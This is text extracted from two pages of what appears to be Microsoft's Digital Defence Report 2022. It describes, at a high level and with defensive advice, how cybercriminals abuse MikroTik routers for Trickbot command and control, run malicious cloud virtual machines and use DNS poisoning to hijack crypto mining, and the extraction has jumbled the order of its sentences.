  • 27. Devices acting as reverse proxies for malware C2 are not just unique to Trickbot and MikroTik routers. In collaboration with the Microsoft RiskIQ team, we traced back to the C2 involved and, through observing SSL certificates, identified Ubiquiti and LigoWave devices that are impacted as well.32 This is a strong indication that IoT devices are becoming active components of nation state coordinated attacks and a popular target for cybercriminals using widespread botnets. redirects traffic between two ports in the router, establishing the line of communication between Trickbot-affected devices and the C2. We have aggregated our knowledge of the various methods of attacking MikroTik devices, beyond just Trickbot, as well as known common vulnerabilities and exposures (CVEs) into an open-source tool for MikroTik devices, which can extract the forensic artifacts related to attacks on these devices.31 More specifically, we identified how Trickbot operators utilise compromised MikroTik routers and reconfigure them to act as part of their C2 infrastructure. The popularity of these devices compounds the severity of their abuse by Trickbot, and their unique hardware and software enable threat actors to evade traditional security measures, expand their infrastructure and compromise more devices and networks. Exposed routers are at risk of having potential vulnerabilities exploited. By tracking and analysing traffic containing secure shell (SSH) commands, we observed attackers using MikroTik routers to communicate with Trickbot infrastructure after obtaining legitimate credentials to devices. These credentials can be obtained through brute force attacks, exploiting known vulnerabilities with readily available patches and using default passwords. Once a device is accessed, the attacker issues a unique command that Cybercriminal abuse of infrastructure Internet gateways as criminal command and control infrastructure IoT devices are becoming an increasingly popular target for cybercriminals using widespread botnets. When routers are unpatched and left exposed directly to the internet, threat actors can abuse them to gain access to networks, execute malicious attacks and even support their operations. The Microsoft Defender for IoT team conducts research on equipment ranging from legacy industrial control system controllers to cutting- edge IoT sensors. The team investigates IoT- and OT-specific malware to contribute to the shared list of indicators of compromise. Routers are particularly vulnerable attack vectors because they are ubiquitous across internet- connected homes and organisations. We have been tracking the activity of MikroTik routers, a popular router around the world residentially and commercially, identifying how they are utilised for command and control (C2), domain name system (DNS) attacks and crypto mining hijacking. Attacker Command and control Sets up malicious domains Installs Trickbot on target network via a campaign Communicates with C2 via router; drops payloads, steals info Compromised IoT device Target network Performs recon to obtain network information Scans for MikroTik devices that are exposed to the internet Steals device credentials and maintains persistence Executes traffic redirection command Trickbot attack chain showing the use of MikroTik IoT devices as proxy servers for C2. Trickbot attack chain 93,868 1 Number of exposed MikroTik routers Distribution of exposed MikroTik routers around the world 26 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 28. Virtual machines as criminal infrastructure The widespread move to the cloud includes cybercriminals who leverage private assets of unwitting victims obtained through phishing or distributing malware credential stealers. Many cybercriminals are choosing to set up their malicious infrastructures on cloud-based virtual machines (VMs), containers and microservices. Once the cybercriminal has access, a sequence of events can occur to set up infrastructure – such as a series of virtual machines through scripting and automated processes. These scripted, automated processes are used to launch malicious activity including large scale email spam attacks, phishing attacks and web pages hosting nefarious content. It can even include setting up a scaled virtual environment carrying out cryptocurrency mining, causing the end victim a bill of hundreds of thousands of dollars at the end of the month. Cybercriminals understand their malicious activity has a limited life span before it is detected and shut down. As a result, they have scaled up and now operate proactively with contingencies top of mind. They have been observed preparing compromised accounts ahead of time and monitoring their environments. As soon as an account (set up using hundreds of thousands of virtual machines) is detected, they traverse to In the past year, Microsoft observed a growing number of attacks that abuse routers for redirecting cryptocurrency mining efforts. Cybercriminals compromise routers connected to mining pools and redirect mining traffic to their associated IP addresses with DNS poisoning attacks, which alters the DNS settings of targeted devices. Affected routers register the wrong IP address to a given domain name, sending their mining resources – or hashes – to pools used by threat actors. These pools might mine anonymous coins associated with criminal activities or use legitimate hashes generated by miners to acquire a percentage of the coin that they mined, thus reaping the rewards. With more than half of known vulnerabilities found in 2021 lacking a patch, updating and securing routers on corporate and private networks remains a significant challenge for device owners and administrators. Crypto criminals abusing IoT devices Gateway devices are an increasingly valuable target for threat actors as the number of known vulnerabilities has grown consistently from year to year. They are being used for crypto mining and other types of malicious activity. As cryptocurrency has become more popular, many individuals and organisations have invested computational power and network resources from devices such as routers to mine coins on the blockchain. However, mining cryptocurrency is a time- and resource-intensive process with a low probability of success. To increase the likelihood of mining a coin, miners pool together in distributed, cooperative networks, receiving hashes relative to the percentage of the coin they succeeded in mining with their connected resources. the next account – already prepared by scripts to be immediately activated – and their malicious activity continues with little to no interruption. Like cloud infrastructure, on-premises infrastructure can be used in attacks with virtual local environments that are unknown to the on-premises user. This requires the initial access point to remain open and accessible. On-premises private assets have also been abused by cybercriminals to initiate an onward chain of cloud infrastructure, set up to obfuscate their origin to avoid suspicious infrastructure creation detection. DNS poisoning of gateway devices compromises legitimate mining activities and redirects resources to criminal mining activities. Actionable insights 1 Implement good cyber hygiene and provide cybersecurity training for employees with guidance for avoiding being socially engineered. 2 Conduct regular automated user activity anomaly checks through detections at scale to help reduce these types of attacks. 3 Update and secure routers on corporate and private networks. Portion of hashes from original pool are stolen by threat actors, or resources are transferred to their pool, or routers have malware on them that steal resources for mining. Miner Miners Cryptocurrency DNS Poisoning Criminal’s pool Pool ASIC Miners Miners Miners Routers Compromising devices for illegal crypto mining. 27 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience